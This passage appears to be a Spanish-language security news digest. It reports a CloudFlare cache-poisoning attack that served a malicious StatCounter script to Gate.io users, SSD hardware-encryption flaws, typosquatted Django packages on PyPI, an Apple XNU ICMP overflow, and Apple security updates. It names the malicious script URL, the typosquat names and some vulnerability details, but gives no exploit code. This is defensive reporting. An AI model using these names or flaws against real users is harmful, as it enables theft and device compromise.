Es difícil determinar cuántos bitcoins han sido transferidos a los atacantes, ya que se generan nuevas direcciones cada vez que se carga el script ‘https://www.statconuter.com/c.php’. A pesar de esto, desde Gate.io no tienen constancia de que ninguno de sus usuarios haya sido afectado.
Para introducir el script modificado, los atacantes no comprometieron ninguno de los servidores de StatCounter, sino que envenenaron la caché de CloudFlare para que se sirviera el código malicioso. CloudFlare ya advirtió de esta vulnerabilidad hace unos meses y desde Hispasec recomendamos seguir sus recomendaciones para evitar este tipo de ataques.
Más información:
Supply-chain attack on cryptocurrency exchange gate.io
https://www.welivesecurity.com/2018/11/06/supply-chain-attack-cryptocurrency-exchange-gate-io/
Descubiertos fallos en cifrado por hardware en los SSD más populares
Las pruebas realizadas a varios modelos SSD tanto de Samsung como de Crucial revelan que la seguridad es insuficiente e incluso nula.
Investigadores de los Países Bajos han puesto a prueba la seguridad del cifrado por hardware de varios modelos SSD, poniendo en entredicho las medidas de cifrado incluidas en los mismos. Los modelos afectados son los Crucial MX100, MX200 y MX300, los Samsung EVO 840 y 850, y los Samsung USB T3 y T5. En caso de poseer alguno de los modelos afectados, y estar utilizando el cifrado por hardware, se recomienda cambiar a cifrado vía software. Otros modelos, sobre todo de las mismas marcas, podrían estar afectados.
Muchos fabricantes recomiendan el empleo del cifrado por hardware, al considerar que son superiores a los métodos existentes en el cifrado vía software, lo que no es necesariamente cierto. En ocasiones, puede pensarse que se está utilizando un cifrado vía software y estar empleando un cifrado vía hardware; es el caso de Microsoft Bitlocker, el cual utilizará el cifrado del disco SSD si éste tuviese este modo habilitado.
Los problemas encontrados son considerados graves para la mayoría de los modelos anteriores y permiten el descifrado del disco sin necesidad de la clave del usuario. En el caso del Crucial MX300, el fallo es incluso más grave al utilizar como clave maestra un string de 32 bytes vacío. Es posible que en una futura actualización del firmware se solucionen estos fallos, pero en tal caso puede requerirse volver a cifrar el disco, dependiendo del tipo de vulnerabilidad.
Los fallos encontrados en estos modelos de SSD no suponen que el cifrado vía hardware tenga que ser necesariamente inseguro, pero sí que marcas tan populares como Samsung y Crucial no se han tomado en serio esta característica de sus productos. Para considerarse seguro, los fabricantes deben poner a prueba sus métodos de cifrado con auditorías externas y ser más transparentes acerca de su funcionamiento. En el cifrado por software, existen soluciones muy estandarizadas y probadas en la industria como pueden ser LUKS y VeraCrypt, los cuales son una alternativa fiable al cifrado vía hardware.
Más información:
Self-encrypting deception: weaknesses in the encryption of solid state drives (SSDs):
https://www.ru.nl/publish/pages/909282/draft-paper.pdf
Doh! What My Encrypted Drive Can Be Unlocked By Anyone?
https://medium.com/asecuritysite-when-bob-met-alice/doh-what-my-encrypted-drive-can-be-unlocked-by-anyone-a495f6653581
Paquetes maliciosos en el repositorio de python PyPI
Se ha descubierto un total de 12 librerías maliciosas en el repositorio de Python PyPI, subidas al repositorio, usando técnicas de ‘Typosquatting’ con del popular framework de desarrollo web Django.
PyPI (Python Package Index) es el repositorio de librerías de Python por excelencia. El repositorio permite la descarga e instalación de los paquetes necesarios para nuestros proyectos de desarrollo de forma fácil y cómoda.
La forma de instalar los paquetes que tiene PyPI es utilizando sentencia:
python pip install <nombre_de_paquete>
Donde <nombre_de_paquete> será sustituido por el paquete que queramos instalar en nuestro proyecto.
La forma en la que los atacantes alojan código malicioso en este tipo de repositorios no es comprometiendo un paquete legítimo, sino poniendo en los repositorios oficiales paquetes fraudulentos. Para realizar este tipo de ataques se utiliza (descarga) el paquete oficial como base, y partiendo desde aquí, se va añadiendo el código malicioso, y una vez terminado, se sube al repositorio oficial con nombres similares al original. A modo de ejemplo, los paquetes encontrados fueron: ‘Diango’, ‘Djago’, ‘Dajngo’, ‘Djanga’ que fueron creados para suplantar al paquete ‘Django’.
El ataque utilizado es el denominado ‘Typosquatting’ que consiste en la utilización de nombres similares, pero con algún error ortográfico al que se quiere suplantar esperando un error tipográfico por parte de los desarrolladores.
Los paquetes han sido detectados por un investigador con el seudónimo ‘Bertus’, el cual utilizó un sistema de escaneo automatizado que creó él mismo.
Actualmente los paquetes detectados han sido eliminados del repositorio PyPI.
Más información:
Encuentran 12 bibliotecas maliciosas en Python PyPI:
http://noticiasseguridad.com/tecnologia/encuentran-12-bibliotecas-maliciosas-en-python-pypi/
Vulnerabilidad en la gestión de paquetes ICMP en el kernel de XNU de Apple
El investigador de seguridad Kevin Backhouse ha descubierto una vulnerabilidad en el núcleo de XNU de Apple relacionada con la gestión de los paquetes ICMP.
La vulnerabilidad se produce cuando el kernel XNU recibe un paquete ICMP especialmente diseñado. De forma que, cualquier dispositivo que se encuentre en la misma red, solamente debe enviar este paquete para explotar la vulnerabilidad. Y, como se puede apreciar en el vídeo de la prueba de concepto, no requiere ningún tipo de interacción por parte de la víctima.
Video of my PoC for CVE-2018-4407. It crashes any macOS High Sierra or iOS 11 device that is on the same WiFi network. No user interaction required. pic.twitter.com/tXtp7QRCp8
— Kevin Backhouse (@kevin_backhouse) October 30, 2018
Más especificamente, la vulnerabilidad se trata de un desbordamiento de del buffer en el heap, que se produce porque el atacante controla el tamaño y contenido del buffer utilizando diferentes campos del paquete. Por ello, aunque de momento solamente se ha realizado una prueba de concepto que hace que el dispositivo se reinicie debido al fallo, debería poderse aprovechar esta vulnerabilidad para lograr la ejecución de código remoto.
Teniendo en cuenta que XNU es el kernel utilizado en los sistemas operativos de los dispositivos Apple, esta vulnerabilidad afecta tanto a iOS como a macOS. Las siguientes versiones de los sistemas operativos son vulnerables:
– iOS 11 e inferiores
– macOS High Sierra 10.13.6 e inferiores
– macOS Sierra 10.12.6 e inferiores
– Mac OSX El Capitan e inferiores
Desde Hispasec, recomendamos actualizar el dispositivo con la máxima celeridad posible.
Más Información:
Entrada de blog Kevin Backhouse:
https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407
Prueba de concepto:
https://twitter.com/kevin_backhouse/status/1057352656560287746
Actualizaciones para múltiples productos de Apple
Apple ha publicado 7 boletines de seguridad que solucionan vulnerabilidades en los productos Safari, iCloud para Windows, iTunes, watchOS, iOS, tvOS y macOS. Entre todos los productos se corrigen 177 fallos de seguridad.
Los boletines publicados con las actualizaciones y problemas solucionados se resumen a continuación.
El boletín para el sistema operativo para dispositivos móviles de Apple (iPad, iPhone, iPod, etc.), iOS 12.1, resuelve 31 vulnerabilidades relacionadas con múltiples componentes, entre los que se incluyen ‘Wi-Fi’, ‘FaceTime’, el kernel y ‘WebKit’ entre otros. Uno de los fallos permitiría a una web maliciosa suplantar la URL mostrada para hacer creer a los usuarios que se encuentran en un sitio web legítimo (CVE-2018-4385).
macOS Mojave 10.14.1 y los ‘Security Update 2018-001 High Sierra’ y ‘2018-005 Sierra’. En este caso se solucionan 71 vulnerabilidades que afectan a múltiples componentes, que entre otros incluyen a ‘afpserver’, ‘AppleGraphicsControl’, ‘APR’, ‘CFNetwork’, ‘CoreCrypto’, ‘Dock’ y el kernel entre otros. Nueve de estas vulnerabilidades permitirían ejecutar código arbitrario con privilegios de sistema (CVE-2018-4126, CVE-2018-4331, CVE-2018-4334, CVE-2018-4350, CVE-2018-4393, CVE-2018-4402, CVE-2018-4410, CVE-2018-4415, CVE-2018-4426).
Safari 12.0.1 cuenta con otro boletín que soluciona 12 vulnerabilidades debidas, en su mayoría, a problemas en ‘WebKit’, el motor de código abierto que es la base de este navegador. Varios de los errores corregidos permitirían a una web maliciosa la ejecución de código arbitrario (CVE-2018-4372, CVE-2018-4373, CVE-2018-4375, CVE-2018-4376, CVE-2018-4382, CVE-2018-4386, CVE-2018-4392, CVE-2018-4416).
El boletín para el sistema operativo de los relojes inteligentes de Apple, watchOS 5.1, soluciona 21 vulnerabilidades entre las que también se encuentran algunas que podrían permitir la ejecución de código arbitrario (CVE-2018-4372, CVE-2018-4373, CVE-2018-4375, CVE-2018-4376, CVE-2018-4382, CVE-2018-4386, CVE-2018-4392, CVE-2018-4416, CVE-2018-4378).
tvOS, el sistema operativo de los televisores de la marca, se actualiza a la versión 12.1, donde se corrigen 15 vulnerabilidades en múltiples componentes. Cinco de ellas podrían permitir la ejecución remota de código (CVE-2018-4372, CVE-2018-4382, CVE-2018-4386, CVE-2018-4392, CVE-2018-4416).
Las versiones iTunes 12.9.1 e iCould 7.8 para Windows corrigen 14 y 13 vulnerabilidades respectivamente, algunas también de gravedad alta.
Todas estas versiones que corrigen los problemas de seguridad publicados en los boletines se encuentran disponibles en la página oficial de Apple, así como a través de los canales habituales de actualización.
Más información:
Safari 12.0.1
https://support.apple.com/es-es/HT209196
iCloud for Windows 7.8
https://support.apple.com/kb/HT209198
iTunes 12.9.1
https://support.apple.com/kb/HT209197
watchOS 5.1
https://support.apple.com/kb/HT209195
iOS 12.1
https://support.apple.com/kb/HT209192
tvOS 12.1
https://support.apple.com/kb/HT209194
macOS Mojave 10.14.1, Security Update 2018-001 High Sierra, Security Update 2018-005 Sierra
https://support.apple.com/kb/HT209193